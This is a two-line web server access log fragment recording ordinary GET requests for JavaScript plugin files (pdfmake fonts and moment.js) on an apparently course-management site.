190.42.110.162 - - [05/Sep/2024:13:18:11 -0300] "GET /gestioncurso/public/plugins/pdfmake/vfs_fonts.js HTTP/1.1" 200 812001
190.42.110.162 - - [05/Sep/2024:13:18:11 -0300] "GET /gestioncurso/public/plugins/moment/moment.min.js HTTP/1.1" 200 58862
